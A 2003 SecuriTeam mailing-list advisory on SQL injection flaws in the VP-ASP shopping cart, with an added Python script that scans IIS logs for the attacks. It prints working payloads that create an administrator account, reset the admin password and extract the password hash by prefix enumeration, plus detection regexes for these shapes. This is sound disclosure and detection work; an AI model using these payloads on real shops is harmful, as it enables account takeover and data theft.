[NT] Virtual Programming VP-ASP Shopping Cart Multiple SQL Injection Vulnerabilities

From: SecuriTeam (support_at_securiteam.com)
Date: 12/01/03

    To: list@securiteam.com
    Date: 1 Dec 2003 17:46:41 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

    Virtual Programming VP-ASP Shopping Cart Multiple SQL Injection Vulnerabilities
    ------------------------------------------------------------------------

    SUMMARY

    Virtual Programming <http://www.vpasp.com> VP-ASP is "a shopping cart
    application for e-commerce enabled sites. It is written in ASP, supports
    the following databases: Access, MSSQL, MySQL on Windows and MySQL on
    UNIX".

    VP-ASP suffers from SQL injection vulnerabilities, which may allow an
    attacker in some cases to gain administrative access to the installed
    VP-ASP Shopping Cart software or execute arbitrary commands on a target's
    system.

    DETAILS

    Vulnerability 1: SQL Injection Vulnerability in 'shopsearch.asp' Script
    An SQL injection vulnerability has been found in the shopsearch.asp
    script. User-supplied input is not filtered before being used in a SQL
    query, so the query can be modified with malformed input.
    Exploitation of the vulnerability allows a remote attacker to insert a new
    user with administrative privileges. A more sophisticated exploitation
    would allow a remote attacker to execute arbitrary commands on a target's
    system (via the MSSQL xp_cmdshell extended stored procedure, for example).

    Exploit:
    Platform: Win32/MSSQL

    Posting this data to shopsearch.asp creates a new administrative account:
    Keyword=&category=5); insert into tbluser (fldusername) values
    ('qasdew')--&SubCategory=&hide=&action.x=46&action.y=6
    Keyword=&category=5); update tbluser set fldpassword='edsaqw' where
    fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6
    Keyword=&category=3); update tbluser set fldaccess='1' where
    fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6

    Posting this data to shopsearch.asp changes the admin password:
    Keyword=&category=5); update tbluser set fldpassword='edsaqw' where
    fldusername='admin'--&SubCategory=All&action.x=33&action.y=6

    Vulnerability 2: SQL Injection Vulnerability in 'shopdisplayproducts.asp'
    Script
    An SQL injection vulnerability has been found in the
    shopdisplayproducts.asp script. Exploitation of the vulnerability allows
    a remote attacker to read any information from the database.

    Exploit:
    Platform: Win32/MSSQL
    http://somehost.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'--

    By changing the value at the end of the request:
    %20'a%25'--
    %20'b%25'--
    %20'c%25'--
    ..

    and examining each HTTP response from the VP-ASP web server, an attacker
    can recover the administrator password one character prefix at a time.
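    The following Python script is an added detection example; it is not part of the advisory, of S-Quadra's work, or of VP-ASP. It parses constructed IIS W3C extended log lines (sample data, not from any real server), URL-decodes the cs-uri-query field, flags the query shapes the two vulnerabilities above rely on (stacked "); insert/update ..." statements ending in "--", and a "union select" against tbluser), and reports clients that cycle through LIKE 'x%' prefixes the way the password-enumeration step above does. It also counts POST requests to shopsearch.asp, because the W3C log does not record request bodies: the first exploit is invisible in a standard IIS log and has to be caught elsewhere (request-body logging, a web application firewall, or auditing of tbluser changes in the database). The indicator names, the log field layout and the threshold of three prefixes are this example's own choices.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample in IIS W3C extended log format (hypothetical data, not
# taken from any real server). Field order, as declared in the #Fields line:
#   date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
# cs-uri-query is logged URL-encoded, exactly as the client sent it.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2003-11-28 10:01:02 192.0.2.10 GET /vpasp/shopdisplayproducts.asp cat=Books 200
2003-11-28 10:01:04 192.0.2.10 GET /vpasp/shopsearch.asp Keyword=lamp&category=5&SubCategory=All 200
2003-11-28 10:02:10 192.0.2.77 GET /vpasp/shopdisplayproducts.asp cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'-- 200
2003-11-28 10:02:11 192.0.2.77 GET /vpasp/shopdisplayproducts.asp cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'b%25'-- 200
2003-11-28 10:02:12 192.0.2.77 GET /vpasp/shopdisplayproducts.asp cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'c%25'-- 200
2003-11-28 10:03:00 192.0.2.10 POST /vpasp/shopsearch.asp - 200
"""

# Captures the prefix in a "LIKE 'abc%'" clause, used to spot enumeration.
LIKE_PREFIX_RX = re.compile(r"\blike\s+'([^']*)%'", re.I)

# Indicators are matched against the URL-decoded query string. The names are
# this example's own labels for the shapes the advisory describes.
INDICATORS = [
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("stacked_dml", re.compile(r"\)\s*;\s*(?:insert|update|delete)\b", re.I)),
    ("comment_tail", re.compile(r"--\s*$")),
    ("tbluser_ref", re.compile(r"\btbluser\b", re.I)),
    ("like_prefix", LIKE_PREFIX_RX),
]


def parse_iis_line(line):
    """Split one W3C log line into a dict; None for directives and blank lines."""
    if not line or line.startswith("#"):
        return None
    parts = line.split(" ", 6)
    if len(parts) != 7:
        return None
    date, time, c_ip, method, stem, query, status = parts
    return {"date": date, "time": time, "c_ip": c_ip, "method": method,
            "stem": stem, "query": "" if query == "-" else unquote_plus(query),
            "status": status}


def injection_indicators(query):
    """Return the names of every indicator that fires on a decoded query string."""
    return [name for name, rx in INDICATORS if rx.search(query)]


def analyze(log_text, enumeration_threshold=3):
    """Scan W3C log text; return per-request hits and per-client aggregates."""
    hits = []
    per_ip = defaultdict(lambda: {"count": 0, "like_prefixes": set(),
                                  "shopsearch_posts": 0})
    for raw in log_text.splitlines():
        rec = parse_iis_line(raw)
        if rec is None:
            continue
        stats = per_ip[rec["c_ip"]]
        # POST bodies are not in the W3C log, so the shopsearch.asp exploit
        # cannot be seen here; record the POSTs so an analyst knows to check
        # body logging or database audit records instead.
        if rec["method"] == "POST" and rec["stem"].lower().endswith("/shopsearch.asp"):
            stats["shopsearch_posts"] += 1
        names = injection_indicators(rec["query"])
        if not names:
            continue
        stats["count"] += 1
        m = LIKE_PREFIX_RX.search(rec["query"])
        if m:
            stats["like_prefixes"].add(m.group(1))
        hits.append({"time": rec["time"], "c_ip": rec["c_ip"],
                     "stem": rec["stem"], "indicators": names})
    # A client that walks through several distinct LIKE prefixes is enumerating
    # a column value character by character.
    enumerating = sorted(ip for ip, s in per_ip.items()
                         if len(s["like_prefixes"]) >= enumeration_threshold)
    return {"hits": hits, "per_ip": dict(per_ip), "enumerating_ips": enumerating}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for h in result["hits"]:
        print(h["time"], h["c_ip"], h["stem"], ",".join(h["indicators"]))
    print("clients enumerating via LIKE prefixes:", result["enumerating_ips"])
    for ip, s in result["per_ip"].items():
        if s["shopsearch_posts"]:
            print(f"{ip}: {s['shopsearch_posts']} POST(s) to shopsearch.asp (body not logged)")
```

    The indicator list is deliberately narrow, keyed to the query shapes in this advisory rather than to SQL injection in general; matching on the decoded query matters because the payloads arrive with spaces and the percent sign percent-encoded, so a pattern applied to the raw log field would miss them.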

    Solution:
    S-Quadra alerted the VP-ASP development team to this issue on 28th November
    2003. Security fixes from the VP-ASP development team are available at:
    http://www.vpasp.com/virtprog/info/faq_securityfixes.htm

    ADDITIONAL INFORMATION

    The original advisory is available from:
    http://www.s-quadra.com/advisories/Adv-20031128.txt

    The information has been provided by Nick Gudov <cipher@s-quadra.com>.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ========================================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

